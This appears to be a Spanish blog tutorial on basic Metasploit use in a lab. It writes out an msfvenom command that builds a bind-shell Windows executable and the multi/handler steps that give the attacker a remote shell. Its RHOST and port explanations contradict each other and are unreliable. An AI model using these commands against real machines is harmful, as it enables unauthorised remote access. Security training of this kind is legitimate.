Metasploit básico

Metasploit es un framework de herramientas de seguridad que trae preparados un buen número de exploits listos para ser lanzados. Todo el que esté interesado en la seguridad informática y no lo conozca, ¡ya va tarde!. Para manejar todas las funcionalidades de metasploit hay miles de libros y buenos artículos, pero en este vamos a enfocamos en hacer un simple ejercicio con el framework para que los más noveles se habitúen a esta formidable herramienta y sean capaces de ver el potencial que guarda.escenario_metasploit

El escenario para este ejercicio está formado por dos máquinas, el atacante y la víctima. Presentamos a los participantes: A mi izquierda, una maquina física con Windows 7 instalado, la víctima. A mi derecha, una máquina virtual con la distribución Kali Linux, el atacante. Para este ejercicio se ha trabajado con la subred 192.168.149.0/24, para repetir el ejemplo debéis estar atentos a cambiar las IPs y adaptarlas a vuestro escenario.

En este caso, el ataque que simularemos es uno de los más sencillos posibles, generaremos un archivo ejecutable que abra una Shell con stagers del tipo bind_tcp, para después ejecutarlo en la máquina atacada y comprobar el funcionamiento básico de metasploit.

Para generar un ejecutable infectado usamos la herramienta msfvenom del framework metasploit. Para abrir la herramienta simplemente la ejecutamos en linea de comandos de Kali y vemos los payloads disponibles para cargar: show payloads. En este caso usaremos una shell bind_tcp. Generamos entonces el ejecutable tomando en consideración que el RHOST es la IP del equipo Kali, quién recibirá la conexión desde el equipo víctima (donde la IP del equipo atacante es 192.168.149.131 y el puerto desde donde se realizará la conexión será el 80): msfvenom –p windows/Shell/bind_tcp RHOST=192.168.149.131 LPORT=80 –f exe > p7.exe

msfvenom_exe

Una vez generado el ejecutable, configuramos el framework de metasploit para hacer uso del exploit y conseguir la Shell que pretendemos en nuestra máquina, obteniendo así acceso a la máquina infectada. Primero arrancamos el framework con msfconsole y elegimos el exploit y payload a utilizar: use exploit/multi/handler

msfconsole_handlerPara ver las opciones del exploit y configurar los parámetros, se ejecuta el comando show options. En este caso las opciones que necesitamos configurar para que el ataque sea efectivo son el puerto local LPORT y el host remoto al que conectaremos RHOST. Para configurarlas empleamos el siguiente formato: set  OPCIÓN VALOR, por ejemplo set LPORT 4444. Para este ejercicio, RHOST será la IP del equipo víctima (192.168.149.132).

msfconsole_handler2Comprobamos que está todo correctamente configurado y finalmente lanzamos el exploit, que quedará a la espera de que el equipo atacado ejecute el ejecutable generado: exploit y doble click en el ejecutable generado dentro de la máquina víctima. Si todo se ha hecho bien, tendremos una shell en el equipo víctima y veremos algo como esto en nuestro Kali:

msfconsole_handler3

Y eso es todo, ya tenemos acceso total a la máquina atacada a través de esta shell. Esto es sólo un ejemplo básico del potencial de metasploit, pero sin duda llega mucho más allá. Permanece atento a nuestras redes sociales para saber más sobre metasploit y otras herramientas de hacking ético.

Secmotic Innovation

By | 2017-03-06T09:34:01+00:00 marzo 31st, 2015|Seguridad de la información|0 Comments

About the Author:

Ingeniero de Telecomunicación y Máster en Seguridad de la Información. Apasionado por las nuevas tecnologías y su aplicación al mundo que le rodea.

Leave A Comment